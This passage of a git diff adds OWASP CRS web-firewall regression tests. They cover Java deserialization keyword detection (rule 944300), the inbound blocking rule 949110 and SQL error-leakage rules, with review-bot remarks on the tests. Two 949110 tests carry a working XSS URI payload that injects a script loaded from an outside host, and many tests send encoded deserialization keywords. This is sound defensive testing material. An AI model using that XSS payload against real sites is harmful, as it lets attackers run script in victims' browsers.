log_contains: "id \"944300\"" + - test_title: 944300-294 + desc: "Nested XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-295 + desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-296 + desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-297 + desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-298 + desc: "Argument test includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-299 + desc: "Argument name includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-300 + desc: "Cookie test includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=d2hpbGVjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-301 + desc: "Cookie name includes keyword 
d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: d2hpbGVjbG9zdXJl=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-302 + desc: "Request header test includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: d2hpbGVjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-303 + desc: "XML attribute value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-304 + desc: "XML element value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-305 + desc: "Nested XML element value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-306 + desc: "Content-Type text/plain includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-307 + desc: "Content-Type application/json arg value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-308 + desc: "Content-Type application/json arg name includes keyword 
d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-309 + desc: "Argument test includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-310 + desc: "Argument name includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-311 + desc: "Cookie test includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HdoaWxlY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-312 + desc: "Cookie name includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HdoaWxlY2xvc3VyZQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-313 + desc: "Request header test includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HdoaWxlY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-314 + desc: "XML attribute value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-315 + desc: "XML element value 
includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-316 + desc: "Nested XML element value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-317 + desc: "Content-Type text/plain includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-318 + desc: "Content-Type application/json arg value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-319 + desc: "Content-Type application/json arg name includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-320 + desc: "Argument test includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-321 + desc: "Argument name includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-322 + desc: "Cookie test includes keyword 
B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=B3aGlsZWNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-323 + desc: "Cookie name includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: B3aGlsZWNsb3N1cmU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-324 + desc: "Request header test includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: B3aGlsZWNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-325 + desc: "XML attribute value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-326 + desc: "XML element value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-327 + desc: "Nested XML element value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-328 + desc: "Content-Type text/plain includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-329 + 
desc: "Content-Type application/json arg value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-330 + desc: "Content-Type application/json arg name includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" + output: + log_contains: "id \"944300\"" diff --git a/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml b/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml new file mode 100644 index 0000000000..0250715153 --- /dev/null +++ b/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml 
@@ -0,0 +1,91 @@
+---
+meta:
+ author: "studersi"
+ enabled: true
+ name: "949110.yaml"
+ description: |
+ Test whether the inbound blocking mechanism works by testing whether rule 949110 is triggered.
+ For these tests, existing test are repurposed with different assertions. Instead of asserting that the original
+ rules are triggered that the tests are written for, we assert that triggering these rules causes the blocking
+ rule to be triggered.
+tests:
+ - test_title: 949110-1
+ desc: Test is basically identical to 941100-1 (XSS positive test in phase 2) but here we assert that the inbound blocking mechanism is triggered
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ method: GET
+ port: 80
+ uri: '/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//'
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: localhost
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ output:
+ log_contains: id "949110"
+ - test_title: 949110-2
+ desc: Test is basically identical to 941100-4 (XSS negative test in phase 2) but here we assert that inbound blocking mechanism is not triggered
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ method: GET
+ port: 80
+ uri: /
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Referer: http://www.cnn.com
+ Host: localhost
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ output:
+ no_log_contains: id "949110"
+ - test_title: 949110-3
+ desc: Test is basically identical to 920100-9 (protocol enforcement negative test in phase 1) but here we assert that the inbound blocking mechanism is not triggered
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ method: "OPTIONS"
+ port: 80
+ headers:
+ User-Agent: "OWASP CRS test agent"
+
Host: "localhost"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ protocol: "http"
+ uri: "/"
+ version: "HTTP/1.1"
+ output:
+ no_log_contains: "id \"949110\""
+ - test_title: 949110-4
+ desc: Test is basically identical to 920100-10 (protocol enforcement positive test in phase 1) but here we assert that inbound blocking mechanism is triggered
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ method: "REALLYLONGUNREALMETHOD"
+ port: 80
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: "localhost"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ protocol: "http"
+ uri: "/"
+ version: "HTTP/1.1"
+ output:
+ log_contains: "id \"949110\""
+ - test_title: 949110-5
+ desc: Test is basically identical to 949110-0 (see above) but here we assert that the scores are summed up and reported properly
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ method: GET
+ port: 80
+ uri: '/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//'
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: localhost
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ output:
+ log_contains: "Inbound Anomaly Score Exceeded [(]Total Score: "
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml
new file mode 100644
index 0000000000..be9efacdaf
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml
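Review bot: Test 949110-5's `desc` refers to "949110-0 (see above)", but this file's tests begin at 949110-1 and the request it reuses is 949110-1's, so the line should read `desc: Test is basically identical to 949110-1 (see above) but here we assert that the scores are summed up and reported properly`. The same test claims to verify that the scores are summed up, yet its assertion `log_contains: "Inbound Anomaly Score Exceeded [(]Total Score: "` stops just before the number, so any total would pass; extending it to `log_contains: "Inbound Anomaly Score Exceeded [(]Total Score: <EXPECTED_SCORE>"` (placeholder for the score the triggered rules produce at the paranoia level the suite runs at) would actually pin the sum. In the meta description, `existing test are repurposed` should be `existing tests are repurposed`.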
@@ -0,0 +1,27 @@
+---
+meta:
+ author: "azurit"
+ enabled: true
+ name: "951110.yaml"
+ description: "Regression tests for rule 951110"
+tests:
+ - test_title: 951110-1
+ desc: "Matching Microsoft Access SQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "[match sql-errors.data]the used select statements have different number of columns[/match]: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression"
+ output:
+ log_contains: "id \"951110\""
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml
new file mode 100644
index 0000000000..7220096837
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml
@@ -0,0 +1,27 @@
+---
+meta:
+ author: "azurit"
+ enabled: true
+ name: "951120.yaml"
+ description: "Regression tests for rule 951120"
+tests:
+ - test_title: 951120-1
+ desc: "Matching Oracle SQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL Error: ORA-00933: SQL command not properly ended"
+ output:
+ log_contains: "id \"951120\""
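Review bot: 951110.yaml carries a single positive test, so a later regex change that makes rule 951110 fire on ordinary response bodies would go unnoticed; a second test with benign text (a constructed example: `data: "Access to the Microsoft download page is restricted"`) and `no_log_contains: "id \"951110\""` would pin the negative side. The same single-positive-test layout is repeated in 951120 through 951260 in the following hunks. Each stage also sends a `data:` body together with `method: "GET"`, which appears to rely on the `uri: "/anything"` backend echoing the request body into the response so that the response-phase rule sees it; that is inferred from the path rather than visible here, and a one-line comment above `data:` such as `# request body is echoed back by /anything, so the rule inspects it as response content` would record the dependency for the next maintainer.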
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml
new file mode 100644
index 0000000000..2c8e7a707e
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml
@@ -0,0 +1,27 @@
+---
+meta:
+ author: "azurit"
+ enabled: true
+ name: "951130.yaml"
